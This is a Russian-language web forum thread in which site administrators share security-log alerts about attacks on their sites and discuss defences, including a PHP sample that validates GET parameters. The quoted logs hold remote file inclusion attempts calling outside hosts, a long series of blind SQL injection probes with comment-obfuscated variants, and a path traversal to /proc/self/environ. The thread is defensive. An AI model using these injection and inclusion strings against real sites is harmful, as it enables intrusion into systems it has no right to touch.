СегоднЯ обнаружил 10 писем в почтовом Ящике с сообщением о безопасности.
ЦИТАТА
Безопасность
Запрещенное действие: URL in GET - path = http://test.bigshop.cz/uploaded/injek.txt?? IP Адрес: 209.151.70.1 Пользователь: Guest Ссылка: //?path=http://test.bigshop.cz/uploaded/injek.txt?? Браузер: libwww-perl/5.833 Дата размещения: 03.02.2010 - 08:45:5
Просмотрев что находитьсЯ по этому адресу увидел код, кто разбираетсЯ, что с помощью этого кода хотели сделать! Кстати показал другу этот адресок, когда он его открыл, у него нод32 сработал и показал image001.png ( 7.67 Кб )
Кол-во загрузок: 35 , мой же NOD32 с сегодняшними обновлениЯми не реагирует. Вот код длЯ разбора полётов. Отписываем что с помощью него можно и что хотели сделать?
Успокойся, ничего страшного. Просто пытались выяснить сведения о твоей системе. Но конечно на основе этих данных можно планировать дальнейшую атаку на твой сервер. Тоесть например исполнение команды id в ОС типа linux даст вот такой вывод: uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) в том случае если вебсервер (apache например) у тебя запущен от имена root а это уже серьезный прокол в защите системы
Сообщение отредактировал vitalik1972: Feb 4 2010, 11:11
СегоднЯ обнаружил 10 писем в почтовом Ящике с сообщением о безопасности. Просмотрев что находитьсЯ по этому адресу увидел код, кто разбираетсЯ, что с помощью этого кода хотели сделать! Кстати показал другу этот адресок, когда он его открыл, у него нод32 сработал и показал image001.png ( 7.67 Кб )
Кол-во загрузок: 35 , мой же NOD32 с сегодняшними обновлениЯми не реагирует. Вот код длЯ разбора полётов. Отписываем что с помощью него можно и что хотели сделать?
Млин, очередной раз повторяю, не храните пароли в файловых менеджерах !!! Раз код туда попал - значит трояном увели пароль. Храните его в голове !!! Трояны постоянно совершенствуются.
Все пароли храню и так в голове, из файловых менеджеров сразу удаляю. Сам код на мой хост не попал, он запускался со стороннего сайта, адрес указан в отчётном письме о безопастности. Последнее времЯ чуть ли не каждый день мне приходЯт сообщениЯ о безопастности. Напиример сегоднЯ тоже пришло, по ходу обращались с другова сайта, код немного другой, но действиЯ те же. Поэтому как только приходит сообщение о безопастности, зразу баню по IP.
ЦИТАТА
Безопасность
Запрещенное действие: URL in GET - rootdir = http://scan.ucoz.net/id1.txt? IP Адрес: 121.88.4.141 Пользователь: Guest Ссылка: /index.php//surveys/classes/core/language.php?rootdir=http://scan.ucoz.net/id1.txt? Браузер: Mozilla/5.0 Дата размещения: 08.02.2010 - 23:27:54
Это возможно? Вообще как делают SQL инекцию? Много слышал об этом но не знаю как это делаетсЯ и соответственно не знаю как от этого защищаться?
Через передачу в качестве параметра SQL-запроса или скрипта. Защититься на самом деле несложно: нужно проверять передаваемые данные. Бороться с одинарными и двойными кавычками, ограничивать длину передаваемых параметров, блокировать запросы со словами script, UNION и т.д.
Если передаваться в качестве параметра должно число, то intval() тебе в помощь, если текст, то text_filter(). Эти функции серьезно портят жизнь любителям инъекций..
darkflasher, Вас 1 раз(а) поблагодарили за это сообщение:
Если передаваться в качестве параметра должно число, то intval() тебе в помощь, если текст, то text_filter(). Эти функции серьезно портят жизнь любителям инъекций..
Например, есть у нас модуль test, который должен принять два параметра, первый - num (число), второй - txt (текст), которые в этом модуле обрабатываются
Итак, ссылка, которая наверняка заинтересует взломщика, примерно выглядит так: http://your_site.ru/index.php?name=test&am...10&txt=sort Объясняю смысл ссылки: передать сайту в модуль test два параметра методом GET: num=10 и txt="sort"
Будь я на месте взломщика, я бы вместо sort написал плохие вещи и посмотрел, как сайт такое примет)))
Поэтому перед тем, как использовать эти параметры, обезопасим себя:
КОД
if (!defined("MODULE_FILE")) { Header("Location: ../../index.php"); //стандартно.. нет модуля - на главную.. exit; }
function view() { global $db, $prefix, $conf; $num= intval($_GET['num']); //приводим num к числовому формату, вдруг вместо числа пытаются передать текст $txt= text_filter($_GET['txt']); //проверяем текст встроенной функцией AS, которая борется с кавычками, срезает теги и фильтрует слова (их указываем в конфигурации сайта) $txt=substr($txt,0,25); // допустим мы знаем, что параметр txt по идее не должен превышать 25 символов в длину, режем все лишнее - если в параметре передается скрипт, то он останется без концовки, что его сразу обезвредит if ((!$num) || (!$txt)) { Header("Location: /index.php"); //что-то нечисто, выкидываем пользователя на главную.. } else { $result = $db->sql_query("SELECT fulltxt_blablabla FROM ".$prefix."_blablabla WHERE id_blablabla = '$num' AND txt_blablabla LIKE '%$txt%'"); if ($db->sql_numrows($result) == 1) { //перестраховываемся, проверяем, действительно ли выборка успешна, возможно злоумышленник прощупывает базу в надежде найти лазейку list($fulltxt_blablabla) = $db->sql_fetchrow($result); head(); open(); echo $fulltxt_blablabla; //вроде все в порядке, выводим.. close(); foot(); } else { Header("Location: /index.php"); //что-то нечисто, выкидываем пользователя на главную.. } } }
switch($op) { default: view(); break; }
darkflasher, Вас 1 раз(а) поблагодарили за это сообщение:
млин, как меня такая дрянь достала это пипец, и ето 3я часть того что этот мудила там ковырял
КОД
Попытка взлома: Hack in GET - id = 1430\'`([{^~ IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430'`([{^~ Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:40
IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430'`([{^~ Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:40 --- Попытка взлома: madcat.lv -be one of us... - Безопасность
Попытка взлома: Hack in GET - id = 1430\' aND \'8\'=\'8 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:43
IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:43 --- Попытка взлома: madcat.lv -be one of us... - Безопасность
Попытка взлома: Hack in GET - id = 1430\' aND \'8\'=\'3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:43
IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:43 --- Попытка взлома: madcat.lv -be one of us... - Безопасность
Попытка взлома: Hack in GET - id = 1430\' aND \'8\'=\'8 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:46
IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:46 --- Попытка взлома: madcat.lv -be one of us... - Безопасность
Попытка взлома: Hack in GET - id = 1430\' aND \'8\'=\'3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:46
IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:46 --- Попытка взлома: madcat.lv -be one of us... - Безопасность
Попытка взлома: Hack in GET - id = 1430/**/aND/**/8=8 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430/**/aND/**/8=8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:47
IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430/**/aND/**/8=8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:47 --- Попытка взлома: madcat.lv -be one of us... - Безопасность
Попытка взлома: Hack in GET - id = 1430/**/aND/**/8=3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430/**/aND/**/8=3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:48
IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430/**/aND/**/8=3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:48 --- Попытка взлома: madcat.lv -be one of us... - Безопасность
Попытка взлома: Hack in GET - id = 1430\'/**/aND/**/\'8\'=\'8 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430'/**/aND/**/'8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:48
IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430'/**/aND/**/'8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:48 --- Попытка взлома: madcat.lv -be one of us... - Безопасность
Попытка взлома: Hack in GET - id = 1430\'/**/aND/**/\'8\'=\'3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430'/**/aND/**/'8'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:49
IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430'/**/aND/**/'8'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:49 --- Попытка взлома: madcat.lv -be one of us... - Безопасность
Попытка взлома: Hack in GET - id = 1430%\' aND \'8%\'=\'8 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:49
IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:49 --- Попытка взлома: madcat.lv -be one of us... - Безопасность
Попытка взлома: Hack in GET - id = 1430%\' aND \'8%\'=\'3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:50
IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:50 --- Попытка взлома: madcat.lv -be one of us... - Безопасность
Попытка взлома: Hack in GET - id = 1430%\' aND \'8\'=\'8 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:51
IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:51 --- Попытка взлома: madcat.lv -be one of us... - Безопасность
Попытка взлома: Hack in GET - id = 1430%\' aND \'8%\'=\'3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:52
IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:52 --- Попытка взлома: madcat.lv -be one of us... - Безопасность
Попытка взлома: Hack in GET - id = 1430%\'/**/aND/**/\'8\'=\'8 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%'/**/aND/**/'8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:52
IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%'/**/aND/**/'8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:52 --- Попытка взлома: madcat.lv -be one of us... - Безопасность
Попытка взлома: Hack in GET - id = 1430%\'/**/aND/**/\'8%\'=\'3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%'/**/aND/**/'8%'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:53
IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%'/**/aND/**/'8%'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:53 --- Попытка взлома: madcat.lv -be one of us... - Безопасность
Попытка взлома: Hack in GET - id = 1430/**/XoR/**/8=3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430/**/XoR/**/8=3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:58
Кстатье, а как это гамно из файла security.php вычистить, а то уже 150kb набралось?
Кстатье, а как это гамно из файла security.php вычистить, а то уже 150kb набралось?
Вот нифигасе, а почему у тебя права-то на запись стоят для всяких говнокидателей? Не удивлюсь, если у тебя ещё Register globalsвключено, это тогда вообще круто (можно посмотреть это в админке, в блоке Системная информация).
это ясно, уже задрали ковырятса, почти каждый день такая хрень в основном от сюда лезут- IP Адрес: 221.144.12.141 Пользователь: Guest Ссылка: /index.php?name=search&word=lejupl///*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ Браузер: libwww-perl/5.79 Дата размещения: 18.06.2010 - 09:53:19